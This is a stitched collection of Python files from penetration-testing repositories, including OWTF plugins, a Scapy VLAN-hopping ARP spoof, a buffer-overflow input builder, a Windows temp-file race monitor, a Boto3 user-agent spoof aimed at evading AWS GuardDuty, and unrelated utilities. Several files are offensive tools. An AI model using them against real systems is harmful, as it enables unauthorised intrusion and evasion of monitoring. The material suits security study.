warning('usage: padding-oracle-tests.py <data> [blocksize]')
sys.exit(0)
data = sys.argv[1].strip()
bsize = int(sys.argv[2]) if len(sys.argv) > 2 else 0
try:
tester = PaddingOracleTestCasesGenerator(data, bsize)
except Exception as e:
error(str(e))
return False
s = hex_dump(tester.data)
info('Decoded data:\n%s\n' % s)
cases = tester.generate_test_cases()
for case in cases:
if DEBUG:
dbg('...' + case[-48:])
else:
print case
info('\n[+] Generated in total: %d test cases for %s block sizes.' \
% (len(cases), ', '.join([str(e) for e in sorted(tester.blocksizes)])))
if __name__ == '__main__':
main()
| 37.307692 | 151 | 0.640867 |
owtf | from owtf.config import config_handler
from owtf.plugin.helper import plugin_helper
from owtf.plugin.params import plugin_params
DESCRIPTION = "Password Bruteforce Testing plugin"
BRUTEFORCER = ["hydra"]
CATEGORIES = [
"RDP",
"LDAP2",
"LDAP3",
"MSSQL",
"MYSQL",
"CISCO",
"CISCO-ENABLE",
"CVS",
"Firebird",
"FTP",
"FTPS",
"HTTP-PROXY",
"ICQ",
"IMAP",
"IRC",
"NCP",
"NNTP",
"ORACLE-LISTENER",
"ORACLE-SID",
"PCANYWHERE",
"PCNFS",
"POP3",
"POSTGRES",
"REXEC",
"RLOGIN",
"RSH",
"SIP",
"SMB",
"SMTP",
"SNMP",
"SOCKS5",
"SSH",
"SVN",
"TEAMSPEAK",
"TELNET",
"VMAUTHD",
"VNC",
"XMPP",
]
def run(PluginInfo):
Content = []
args = {
"Description": DESCRIPTION,
"Mandatory": {
"RHOST": config_handler.get_val("RHOST_DESCRIP"),
"RPORT": config_handler.get_val("RPORT_DESCRIP"),
"CATEGORY": "Category to use (i.e. " + ", ".join(sorted(CATEGORIES)) + ")",
},
"Optional": {
"BRUTEFORCER": "Bruteforcer to use (i.e. "
+ ", ".join(sorted(BRUTEFORCER))
+ ")",
"ONLINE_USER_LIST": config_handler.get_val("ONLINE_USER_LIST_DESCRIP"),
"ONLINE_PASSWORD_LIST": config_handler.get_val(
"ONLINE_PASSWORD_LIST_DESCRIP"
),
"THREADS": config_handler.get_val("THREADS_DESCRIP"),
"_RESPONSE_WAIT": config_handler.get_val("_RESPONSE_WAIT_DESCRIP"),
"CONNECT_WAIT": config_handler.get_val("CONNECT_WAIT_DESCRIP"),
"REPEAT_DELIM": config_handler.get_val("REPEAT_DELIM_DESCRIP"),
},
}
for args in plugin_params.get_args(args, PluginInfo):
plugin_params.set_config(args)
resource = config_handler.get_resources(
"PassBruteForce_" + args["BRUTEFORCER"] + "_" + args["CATEGORY"]
)
Content += plugin_helper.CommandDump(
"Test Command", "Output", resource, PluginInfo, ""
) # No previous output
return Content
| 24.902439 | 87 | 0.540273 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
from struct import *
buffer = ''
buffer += 'a'*24
buffer += pack("<Q", 0x0000004005e3)
f = open("input.txt", "w")
f.write(buffer)
| 15.666667 | 36 | 0.630872 |
Broken-Droid-Factory | import os.path
import re
from patchers import patcher_interface
class exported_intent_patcher(patcher_interface.patcher):
'''
Removes a random intent filter
'''
difficulty = 1
def patch(self):
'''
A simple patch to remove an intent filter from an exported activity
'''
self.logger("Removing an intent filter from an exported activity")
path_to_android_manifest = self._get_path_to_file("AndroidManifest.xml",
os.path.join(self.working_dir, "app", "src", "main"))
manifest_file = open(path_to_android_manifest, "r")
manifest_file_data = manifest_file.read()
manifest_file.close()
manifest_file_data = re.sub(r'(android:exported="true">(((.|\n)*)<\/intent-filter>))',
'android:exported="true">', manifest_file_data)
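        # Illustrative effect of the substitution above (the manifest fragment is
        # an assumption, not taken from a generated project):
        #   <activity ... android:exported="true"> <intent-filter> ... </intent-filter>
        # collapses to:
        #   <activity ... android:exported="true">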
manifest_file = open(path_to_android_manifest, "w")
manifest_file.write(manifest_file_data)
manifest_file.close()
return "An activity is exported but does not have any active intent filters."
# TODO: Add patch to add an exported True flag to an activity
| 33.4 | 111 | 0.60266 |
Penetration_Testing | '''
Win race conditions!
Inject code before a file gets executed and then deleted.
Suggestion:
* Run the script for 24 hours or longer.
Interesting bugs and information disclosures on top of potential privilege escalations will likely be reported.
Ideas:
* Can save the output to a file.
* Can send the output to a remote server.
'''
import tempfile
import threading
import win32file
import win32con
import os
# These are common temp file directories - modify at will
dirs_to_monitor = ["C:\\WINDOWS\\Temp", tempfile.gettempdir()]
# File modification constants
FILE_CREATED = 1
FILE_DELETED = 2
FILE_MODIFIED = 3
FILE_RENAMED_FROM = 4
FILE_RENAMED_TO = 5
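# Optional helper for the "save the output to a file" idea listed in the notes
# above; it is a sketch, is not called anywhere by default, and the log location
# below is only an assumption - point it at any writable path.
def log_event(line, logfile=os.path.join(tempfile.gettempdir(), "monitor_events.log")):
    with open(logfile, "a") as fd:
        fd.write(line + "\n")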
def start_monitor(path_to_watch):
# Create a thread for each monitoring run
FILE_LIST_DIRECTORY = 0x0001
h_directory = win32file.CreateFile(
path_to_watch,
FILE_LIST_DIRECTORY,
win32con.FILE_SHARE_READ | win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE,
None,
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS,
None)
while 1:
try:
results = win32file.ReadDirectoryChangesW(
h_directory,
1024,
True,
win32con.FILE_NOTIFY_CHANGE_FILE_NAME |
win32con.FILE_NOTIFY_CHANGE_DIR_NAME |
win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES |
win32con.FILE_NOTIFY_CHANGE_SIZE |
win32con.FILE_NOTIFY_CHANGE_LAST_WRITE |
win32con.FILE_NOTIFY_CHANGE_SECURITY,
None,
None)
for action, file_name in results:
full_filename = os.path.join(path_to_watch, file_name)
if action == FILE_CREATED:
print "[+] Created: {}".format(full_filename)
elif action == FILE_DELETED:
print "[-] Deleted: {}".format(full_filename)
elif action == FILE_MODIFIED:
print "[*] Modified: {}".format(full_filename)
                    # Dump out the file contents
print "[...] Dumping contents..."
try:
fd = open(full_filename, "rb")
contents = fd.read()
fd.close()
print contents
print "[!!!] Dump complete."
except:
print "[!!!] Failed to dump contents."
elif action == FILE_RENAMED_FROM:
print "[>] Renamed from: {}".format(full_filename)
elif action == FILE_RENAMED_TO:
print "[<] Renamed to: {}".format(full_filename)
else:
print "[???] Unknown: {}".format(full_filename)
except:
pass
for path in dirs_to_monitor:
monitor_thread = threading.Thread(target=start_monitor, args=(path,))
print "[*] Spawning monitoring thread for path: {}".format(path)
monitor_thread.start()
| 25.284211 | 111 | 0.679487 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalSSIInjection")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 27.636364 | 75 | 0.780255 |
PenetrationTestingScripts | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
import atexit
import contextlib
import sys
from .ansitowin32 import AnsiToWin32
orig_stdout = None
orig_stderr = None
wrapped_stdout = None
wrapped_stderr = None
atexit_done = False
def reset_all():
if AnsiToWin32 is not None: # Issue #74: objects might become None at exit
AnsiToWin32(orig_stdout).reset_all()
def init(autoreset=False, convert=None, strip=None, wrap=True):
if not wrap and any([autoreset, convert, strip]):
raise ValueError('wrap=False conflicts with any other arg=True')
global wrapped_stdout, wrapped_stderr
global orig_stdout, orig_stderr
orig_stdout = sys.stdout
orig_stderr = sys.stderr
if sys.stdout is None:
wrapped_stdout = None
else:
sys.stdout = wrapped_stdout = \
wrap_stream(orig_stdout, convert, strip, autoreset, wrap)
if sys.stderr is None:
wrapped_stderr = None
else:
sys.stderr = wrapped_stderr = \
wrap_stream(orig_stderr, convert, strip, autoreset, wrap)
global atexit_done
if not atexit_done:
atexit.register(reset_all)
atexit_done = True
def deinit():
if orig_stdout is not None:
sys.stdout = orig_stdout
if orig_stderr is not None:
sys.stderr = orig_stderr
@contextlib.contextmanager
def colorama_text(*args, **kwargs):
init(*args, **kwargs)
try:
yield
finally:
deinit()
def reinit():
if wrapped_stdout is not None:
sys.stdout = wrapped_stdout
if wrapped_stderr is not None:
sys.stderr = wrapped_stderr
def wrap_stream(stream, convert, strip, autoreset, wrap):
if wrap:
wrapper = AnsiToWin32(stream,
convert=convert, strip=strip, autoreset=autoreset)
if wrapper.should_wrap():
stream = wrapper.stream
return stream
| 22.108434 | 81 | 0.653104 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2, 2015
Purpose: To grab your current Public IP (Eth & WLAN), Private IP, MAC Addresses, FQDN, and Hostname
Name: hostDetails.py
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import os
import socket
import subprocess
import shutil
import errno
if os.name != "nt":
import fcntl
import urllib2
import struct
import uuid
def get_ip(inter):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip_addr = socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', inter[:15]))[20:24])
return ip_addr
def get_mac_address(inter):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', inter[:15]))
mac_address = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
return mac_address
def get_localhost_details(interfaces_eth, interfaces_wlan):
hostdata = "None"
hostname = "None"
windows_ip = "None"
eth_ip = "None"
wlan_ip = "None"
host_fqdn = "None"
eth_mac = "None"
wlan_mac = "None"
windows_mac = "None"
hostname = socket.gethostbyname(socket.gethostname())
if hostname.startswith("127.") and os.name != "nt":
hostdata = socket.gethostbyaddr(socket.gethostname())
hostname = str(hostdata[1]).strip('[]')
host_fqdn = socket.getfqdn()
for interface in interfaces_eth:
try:
eth_ip = get_ip(interface)
if not "None" in eth_ip:
eth_mac = get_mac_address(interface)
break
except IOError:
pass
for interface in interfaces_wlan:
try:
wlan_ip = get_ip(interface)
if not "None" in wlan_ip:
wlan_mac = get_mac_address(interface)
break
except IOError:
pass
else:
windows_ip = socket.gethostbyname(socket.gethostname())
windows_mac = uuid.getnode()
windows_mac = ':'.join(("%012X" % windows_mac)[i:i+2] for i in range(0, 12, 2))
hostdata = socket.gethostbyaddr(socket.gethostname())
hostname = str(socket.gethostname())
host_fqdn = socket.getfqdn()
return hostdata, hostname, windows_ip, eth_ip, wlan_ip, host_fqdn, eth_mac, wlan_mac, windows_mac
def get_public_ip(request_target):
    public_ip_address = "None"
    grabber = urllib2.build_opener()
    grabber.addheaders = [('User-agent','Mozilla/5.0')]
    try:
        # Use the URL passed in rather than the module-level target_url global
        public_ip_address = grabber.open(request_target).read()
    except urllib2.HTTPError, error:
        print("There was an error trying to get your Public IP: %s") % (error)
    except urllib2.URLError, error:
        print("There was an error trying to get your Public IP: %s") % (error)
    return public_ip_address
wireless_ip = "None"
windows_ip = "None"
ethernet_ip = "None"
public_ip = "None"
host_fqdn = "None"
hostname = "None"
fqdn = "None"
ethernet_mac = "None"
wireless_mac = "None"
windows_mac = "None"
target_url = "http://ip.42.pl/raw"
inter_eth = ["eth0", "eth1", "eth2", "eth3"]
inter_wlan = ["wlan0", "wlan1", "wlan2", "wlan3", "wifi0", "wifi1", "wifi2", "wifi3", "ath0", "ath1", "ath2", "ath3"]
public_ip = get_public_ip(target_url)
hostdata, hostname, windows_ip, ethernet_ip, wireless_ip, host_fqdn, ethernet_mac, wireless_mac, windows_mac = get_localhost_details(inter_eth, inter_wlan)
if not "None" in public_ip:
print("Your Public IP address is: %s") % (str(public_ip))
else:
print("Your Public IP address was not found")
if not "None" in ethernet_ip:
print("Your Ethernet IP address is: %s") % (str(ethernet_ip))
print("Your Ethernet MAC address is: %s") % (str(ethernet_mac))
elif os.name != "nt":
print("No active Ethernet Device was found")
if not "None" in wireless_ip:
print("Your Wireless IP address is: %s") % (str(wireless_ip))
print("Your Wireless Devices MAC Address is: %s") % (str(wireless_mac))
elif os.name != "nt":
print("No active Wireless Device was found")
if not "None" in windows_ip:
print("Your Windows Host IP address is: %s") % (str(windows_ip))
print("Your Windows Mac address is: %s") % (str(windows_mac))
else:
print("You are not running Windows")
if not "None" in hostname:
print("Your System's hostname is: %s") % (hostname)
if host_fqdn == 'localhost':
print("Your System is not Registered to a Domain")
else:
print("Your System's Fully Qualifed Domain Name is: %s") % (host_fqdn)
| 37.5 | 155 | 0.672233 |
owtf | """
ACTIVE Plugin for Generic Unauthenticated Web App Fuzzing via Wapiti
This will perform a "low-hanging-fruit" pass on the web app for easy to find (tool-findable) vulns
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Active Vulnerability Scanning without credentials via Wapiti"
def run(PluginInfo):
resource = get_resources("Wapiti_Unauth")
return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
| 35.214286 | 98 | 0.774704 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.6
class Methods():
class_var=200
def __init__(self):
self.variable=0
def instance_method(self):
self.variable=100
print("------------------------------")
print("Inside Instance Method")
print("Instance is : " +str(self))
print("Instance variable is : "+str(self.variable))
print("Class variable is : " +str(self.__class__.class_var))
print("------------------------------\n")
@classmethod
def class_method(cls):
print("------------------------------")
print("Inside Class Method")
try:
self.variable=22
print("Instance variable is : "+str(Methods().variable))
except Exception as ex:
print("Cant access instance variable in class method")
cls.class_var=33
print("Class is : " +str(cls))
print("Class variable is : "+str(cls.class_var))
print("------------------------------\n")
@staticmethod
def static_method():
print("Inside Static Method")
try:
print("Class=%s and Instance variable =%s : ",(class_var,str(self.variable)))
except Exception as ex:
print("Cant access class and instance variable in static method")
class Driver():
def main(self):
o=Methods()
o.instance_method()
o.class_method()
Methods.class_method()
o.static_method()
Methods.static_method()
print("\n*****************************************************")
print("Lets see variable access of class variables\n\n")
print("--------------------------------------------------")
print('Accessing class variable with Instance "o" : '+str(o.class_var))
o.class_var=222
print('Modifying class variable with Instance "o" : o.class_var = 222')
print('Accessing modified class variable with Instance "o" : ' +str(o.class_var))
print("--------------------------------------------------\n\n")
print("-------------------------------------------------")
oo=Methods()
print('Accessing class variable with New instance "oo" : '+str(oo.class_var))
print('Changes not persisted thus modifying o.class_var created local copy for instance o')
print("--------------------------------------------------\n\n")
print("-------------------------------------------------")
print('Accessing class variable with Class variable : '+str(Methods.class_var))
print('Changes not persisted thus modifying o.class_var created local copy for instance o')
print("--------------------------------------------------\n\n")
print("\n*****************************************************\n")
d=Driver();d.main()
| 33.136986 | 93 | 0.531112 |
Mastering-Machine-Learning-for-Penetration-Testing | import foolbox
import keras
import numpy as np
from keras.applications.resnet50 import ResNet50
import matplotlib.pyplot as plt
# instantiate model
keras.backend.set_learning_phase(0)
kmodel = ResNet50(weights='imagenet')
preprocessing = (np.array([104, 116, 123]), 1)
fmodel = foolbox.models.KerasModel(kmodel, bounds=(0, 255), preprocessing=preprocessing)
# get source image and label
image, label = foolbox.utils.imagenet_example()
# apply attack on source image
# ::-1 reverses the color channels, because Keras ResNet50 expects BGR instead of RGB
attack = foolbox.attacks.FGSM(fmodel)
adversarial = attack(image[:, :, ::-1], label)
plt.figure()
plt.subplot(1, 3, 1)
plt.title('Original')
plt.imshow(image / 255) # division by 255 to convert [0, 255] to [0, 1]
plt.axis('off')
plt.subplot(1, 3, 2)
plt.title('Adversarial')
plt.imshow(adversarial[:, :, ::-1] / 255) # ::-1 to convert BGR to RGB
plt.axis('off')
plt.subplot(1, 3, 3)
plt.title('Difference')
difference = adversarial[:, :, ::-1] - image
plt.imshow(difference / abs(difference).max() * 0.2 + 0.5)
plt.axis('off')
plt.show()
| 26.55 | 88 | 0.712988 |
owtf | """
tests.functional.cli.test_except
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from tests.owtftest import OWTFCliTestCase
class OWTFCliExceptTest(OWTFCliTestCase):
categories = ["cli"]
def test_except(self):
"""Run OWTF web plugins except one."""
self.run_owtf(
"-s",
"-g",
"web",
"-e",
"OWTF-WVS-006",
"%s://%s:%s" % (self.PROTOCOL, self.IP, self.PORT),
)
self.assert_is_in_logs(
"All jobs have been done. Exiting.",
name="MainProcess",
msg="OWTF did not finish properly!",
)
self.assert_is_not_in_logs(
"Target: %s://%s:%s -> Plugin: Skipfish Unauthenticated"
% (self.PROTOCOL, self.IP, self.PORT),
name="Worker",
msg="Skipfish plugin should not have been run!",
)
| 25.117647 | 68 | 0.488162 |
owtf | """
owtf.api.handlers.index
~~~~~~~~~~~~~~~~~~~~~~~
"""
from owtf.api.handlers.base import UIRequestHandler
class IndexHandler(UIRequestHandler):
"""Serves the main webapp"""
SUPPORTED_METHODS = ["GET"]
def get(self, path):
"""Render the homepage with all JavaScript and context.
**Example request**:
.. sourcecode:: http
GET / HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Encoding: gzip
Vary: Accept-Encoding
Server: TornadoServer/5.0.1
Content-Type: text/html; charset=UTF-8
"""
self.render("index.html")
| 20.527778 | 83 | 0.55814 |
owtf | """
Plugin for probing snmp
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = " SNMP Probing "
def run(PluginInfo):
resource = get_resources("BruteSnmpProbeMethods")
return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
| 24 | 88 | 0.75 |
Mastering-Machine-Learning-for-Penetration-Testing | # inspired by Abhijeet Singh classifier
import os
import numpy as np
from collections import Counter
from sklearn.svm import LinearSVC
from sklearn.metrics import confusion_matrix
def make_Dictionary(train_dir):
emails = [os.path.join(train_dir,f) for f in os.listdir(train_dir)]
all_words = []
for mail in emails:
with open(mail) as m:
for i,line in enumerate(m):
if i == 2:
words = line.split()
all_words += words
dictionary = Counter(all_words)
list_to_remove = dictionary.keys()
for item in list_to_remove:
if item.isalpha() == False:
del dictionary[item]
elif len(item) == 1:
del dictionary[item]
dictionary = dictionary.most_common(3000)
return dictionary
def extract_features(mail_dir):
files = [os.path.join(mail_dir,fi) for fi in os.listdir(mail_dir)]
features_matrix = np.zeros((len(files),3000))
docID = 0;
for fil in files:
with open(fil) as fi:
for i,line in enumerate(fi):
if i == 2:
words = line.split()
for word in words:
wordID = 0
for i,d in enumerate(dictionary):
if d[0] == word:
wordID = i
features_matrix[docID,wordID] = words.count(word)
docID = docID + 1
return features_matrix
# Create a dictionary of words with its frequency
train_dir = 'lingspam_public\\lemm_stop\\train-mails'
dictionary = make_Dictionary(train_dir)
# Prepare feature vectors per training mail and its labels
train_labels = np.zeros(702)
train_labels[351:701] = 1
train_matrix = extract_features(train_dir)
# Training SVM and Naive bayes classifier and its variants
model = LinearSVC()
model.fit(train_matrix,train_labels)
# Test the unseen mails for Spam
test_dir = 'lingspam_public\\lemm_stop\\test-mails'
test_matrix = extract_features(test_dir)
test_labels = np.zeros(260)
test_labels[130:260] = 1
result = model.predict(test_matrix)
print confusion_matrix(test_labels,result)
| 26.423077 | 75 | 0.622544 |
Hands-On-AWS-Penetration-Testing-with-Kali-Linux | import random
import boto3
import botocore
# A list of user agents that won't trigger GuardDuty
safe_user_agents = [
'Boto3/1.7.48 Python/3.7.0 Windows/10 Botocore/1.10.48',
'aws-sdk-go/1.4.22 (go1.7.4; linux; amd64)',
'aws-cli/1.15.10 Python/2.7.9 Windows/8 botocore/1.10.10'
]
# Grab the current user agent
user_agent = boto3.session.Session()._session.user_agent().lower()
# Check if we are on Kali, Parrot, or Pentoo Linux against a lowercase version of the user agent
if 'kali' in user_agent.lower() or 'parrot' in user_agent.lower() or 'pentoo' in user_agent.lower():
# Change the user agent to a random one from the list of safe user agents
user_agent = random.choice(safe_user_agents)
# Prepare a botocore config object with our user agent
botocore_config = botocore.config.Config(
user_agent=user_agent
)
# Create the boto3 client, using the botocore config we just set up
client = boto3.client(
'ec2',
region_name='us-east-1',
config=botocore_config
)
# Print out the results of our EC2 DescribeInstances call
print(client.describe_instances()) | 30.4 | 100 | 0.71949 |
Python-Penetration-Testing-Cookbook | import urllib2
import re
from os.path import basename
from urlparse import urlsplit
url = 'https://www.packtpub.com/'
response = urllib2.urlopen(url)
source = response.read()
file = open("packtpub.txt", "w")
file.write(source)
file.close()
patten = '(http)?s?:?(\/\/[^"]*\.(?:png|jpg|jpeg|gif|png|svg))'
for line in open('packtpub.txt'):
for m in re.findall(patten, line):
print('https:' + m[1])
fileName = basename(urlsplit(m[1])[2])
print(fileName)
try:
img = urllib2.urlopen('https:' + m[1]).read()
file = open(fileName, "w")
file.write(img)
file.close()
except:
pass
break
| 23.75 | 63 | 0.570809 |
Python-Penetration-Testing-Cookbook | #!/usr/bin/python
import sys
import time
from scapy.all import *
iface = "en0"
target_ip = '192.168.1.2'
fake_ip = '192.168.1.3'
fake_mac = 'c0:d3:de:ad:be:ef'
our_vlan = 1
target_vlan = 2
ether = Ether()
dot1q1 = Dot1Q(vlan=our_vlan)
dot1q2 = Dot1Q(vlan=target_vlan)
arp = ARP(hwsrc=fake_mac, pdst=target_ip, psrc=fake_ip, op="is-at")
packet = ether/dot1q1/dot1q2/arp
try:
while True:
sendp(packet, iface=iface)
time.sleep(10)
except KeyboardInterrupt:
print("Exiting.. ")
sys.exit(0)
| 15.0625 | 67 | 0.647173 |
Hands-On-Penetration-Testing-with-Python | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Project'
db.create_table(u'xtreme_server_project', (
('project_name', self.gf('django.db.models.fields.CharField')(max_length=50, primary_key=True)),
('start_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('query_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
('consider_only', self.gf('django.db.models.fields.TextField')()),
('exclude_fields', self.gf('django.db.models.fields.TextField')()),
('status', self.gf('django.db.models.fields.CharField')(default='Not Set', max_length=50)),
('login_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('logout_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('username', self.gf('django.db.models.fields.TextField')()),
('password', self.gf('django.db.models.fields.TextField')()),
('username_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('password_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('addParameter_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('addParameter', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('auth_mode', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'xtreme_server', ['Project'])
# Adding model 'Page'
db.create_table(u'xtreme_server_page', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('URL', self.gf('django.db.models.fields.URLField')(max_length=200)),
('content', self.gf('django.db.models.fields.TextField')(blank=True)),
('visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('status_code', self.gf('django.db.models.fields.CharField')(max_length=256, blank=True)),
('connection_details', self.gf('django.db.models.fields.TextField')(blank=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('page_found_on', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Page'])
# Adding model 'Form'
db.create_table(u'xtreme_server_form', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('form_found_on', self.gf('django.db.models.fields.URLField')(max_length=200)),
('form_name', self.gf('django.db.models.fields.CharField')(max_length=512, blank=True)),
('form_method', self.gf('django.db.models.fields.CharField')(default='GET', max_length=10)),
('form_action', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
('form_content', self.gf('django.db.models.fields.TextField')(blank=True)),
('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('input_field_list', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Form'])
# Adding model 'InputField'
db.create_table(u'xtreme_server_inputfield', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('input_type', self.gf('django.db.models.fields.CharField')(default='input', max_length=256, blank=True)),
))
db.send_create_signal(u'xtreme_server', ['InputField'])
# Adding model 'Vulnerability'
db.create_table(u'xtreme_server_vulnerability', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('details', self.gf('django.db.models.fields.TextField')(blank=True)),
('url', self.gf('django.db.models.fields.TextField')(blank=True)),
('re_attack', self.gf('django.db.models.fields.TextField')(blank=True)),
('project', self.gf('django.db.models.fields.TextField')(blank=True)),
('timestamp', self.gf('django.db.models.fields.TextField')(blank=True)),
('msg_type', self.gf('django.db.models.fields.TextField')(blank=True)),
('msg', self.gf('django.db.models.fields.TextField')(blank=True)),
('auth', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Vulnerability'])
# Adding model 'Settings'
db.create_table(u'xtreme_server_settings', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
('consider_only', self.gf('django.db.models.fields.TextField')()),
('exclude_fields', self.gf('django.db.models.fields.TextField')()),
('username', self.gf('django.db.models.fields.TextField')()),
('password', self.gf('django.db.models.fields.TextField')()),
('auth_mode', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'xtreme_server', ['Settings'])
# Adding model 'LearntModel'
db.create_table(u'xtreme_server_learntmodel', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Page'])),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('query_id', self.gf('django.db.models.fields.TextField')()),
('learnt_model', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['LearntModel'])
def backwards(self, orm):
# Deleting model 'Project'
db.delete_table(u'xtreme_server_project')
# Deleting model 'Page'
db.delete_table(u'xtreme_server_page')
# Deleting model 'Form'
db.delete_table(u'xtreme_server_form')
# Deleting model 'InputField'
db.delete_table(u'xtreme_server_inputfield')
# Deleting model 'Vulnerability'
db.delete_table(u'xtreme_server_vulnerability')
# Deleting model 'Settings'
db.delete_table(u'xtreme_server_settings')
# Deleting model 'LearntModel'
db.delete_table(u'xtreme_server_learntmodel')
models = {
u'xtreme_server.form': {
'Meta': {'object_name': 'Form'},
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'form_action': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'form_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'form_method': ('django.db.models.fields.CharField', [], {'default': "'GET'", 'max_length': '10'}),
'form_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_field_list': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"})
},
u'xtreme_server.inputfield': {
'Meta': {'object_name': 'InputField'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_type': ('django.db.models.fields.CharField', [], {'default': "'input'", 'max_length': '256', 'blank': 'True'})
},
u'xtreme_server.learntmodel': {
'Meta': {'object_name': 'LearntModel'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'learnt_model': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
